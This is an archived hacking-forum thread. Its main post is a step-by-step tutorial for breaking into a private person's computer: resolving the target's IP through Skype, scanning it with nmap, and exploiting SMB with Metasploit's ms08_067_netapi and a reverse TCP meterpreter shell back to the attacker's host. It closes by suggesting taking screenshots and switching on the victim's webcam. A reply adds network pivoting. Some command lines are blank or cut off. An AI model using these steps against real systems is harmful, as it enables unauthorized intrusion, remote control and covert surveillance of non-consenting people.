This forum is in archive mode. You will not be able to post new content.

Author Topic: How to combind Metasploit and Nmap in a charming way  (Read 1971 times)

0 Members and 1 Guest are viewing this topic.

Offline Moon Cat

  • NULL
  • Posts: 2
  • Cookies: -100
  • Maxcharacters? People have control over THEIR browsers. You can't put a filter client-sided.
    • View Profile
How to combind Metasploit and Nmap in a charming way
« on: January 11, 2015, 06:12:42 PM »
Brief Introduction
Some years ago nmap and an exploit database was enough to rule half the internet.
Today barely no one uses nmap... at all.
All you had to do was to tell a customer you were a 1337 security professional.
Keep in mind that customers only applied patches if it fixed something on the system.
It was common practice not to apply system updates that didn't fix a problem you were experiencing on a system.

Then what you had to do was to scan the customer network with nmap, ISS or Nessus.
Because they didn't add patches and updates there was loads of vulnerabilities on the systems, and from there you break out your 1337 tools and you pwn it all.

Today is way different, you'd never port scan and there's so much more you have to find your way through, e.g firewalls, anti-viruses and stuff like that.
Most people would rather go through the web app and look for common vulnerabilities in there such as SQL injection, cross-site scripting, etc.
Today I'm bringing the old days back, and I'm going to teach you how to hack yourself into networks, and make all the boxes yours.

The Interesting part
So, I'm going to asume you already have Linux, Metasploit and Nmap installed.
Let's say your target is John. John has a Skype account which you know of, so what you do is you successfully Skype resolve him and you get his current IP address;
Now open up your Linux terminal and put the following command in
Code: [Select]
nmap -sVNow, in your case you're obviously going to change the IP address to whatever your target is.
If the host is up you'll hopefully get some ports back that are open.
Code: [Select]
Starting Nmap 5.21 ( ) at 2015-01-04 20:05 GMT
Nmap scan report for (
Host is up (0.0017s latency).
Not shown: 994 filtered ports
53/tcp   open   domain     pdnsd
80/tcp   open   tcpwrapped
443/tcp  open   tcpwrapped
445/tcp  open   Microsoft-DS
8000/tcp open   http-alt?
9001/tcp closed tor-orport

Cool. We have a couple of open ports on Johns network.
What we need to do is to find the outdated service so we can exploit it. To do this you have to look for the service name in different exploit databases.

For this tutorial I'm using Now I go to the search box and search for Microsoft-DS.
Holy sh-, we got a result:

At this point Johns network is not looking good, but it gets better.
For the next step, write the command "msfconsole" and wait a moment.
When it opens up write: use (exploit name). For John here, the exploit name is going to be ms08_067_netapi.
Let's set some stuff and configure the exploit, do this by writing the following command:
Code: [Select]
show options
Here we need to set the RHOST (Remote Host) which is Johns IP address.
Code: [Select]
set rhost
And here we need to set the payload. The payload is basically like a bomb, someone has to carry it inside and blow it up.
I'm going to use a reverse TCP meterpreter shell.
Code: [Select]
set payload windows/meterpreter/reverse_tcpLet's set the LHOST and LPORT, which is my IP address and port we're going to listen for the meterpreter shell on.
Code: [Select]
set lhost (my IP)
Code: [Select]
set lport 4444(Keep in mind that John is outside my network, which means that I have to portforward port 4444)

Now we're set. Let's exploit this and own John by typing the following command:
Code: [Select]
Now you should hopefully have a meterpreter session running, and this works about the same way as netcat does.
That's it, take screenshots, put his webcam on, do whatever; all his boxes are belong to us.

« Last Edit: January 11, 2015, 06:15:27 PM by Moon Cat »

Offline n01xxv

  • Serf
  • *
  • Posts: 21
  • Cookies: 1
    • View Profile
Re: How to combind Metasploit and Nmap in a charming way
« Reply #1 on: January 18, 2015, 04:06:04 PM »
All that can be done through metasploit
Code: [Select] we can add that after have the root (or admin in this windows OS case) access it is possible to pivoting into the network through meterpreter :
Code: [Select]

But it's nice to remember that there is not only web-app's vulnerabilities in life :)
"Which came first, the bug or the exploit ?"
-- blackngel - Phrack 67 - 0x08


Want to be here? Contact Ande, Factionwars or Kulverstukas on the forum or at IRC.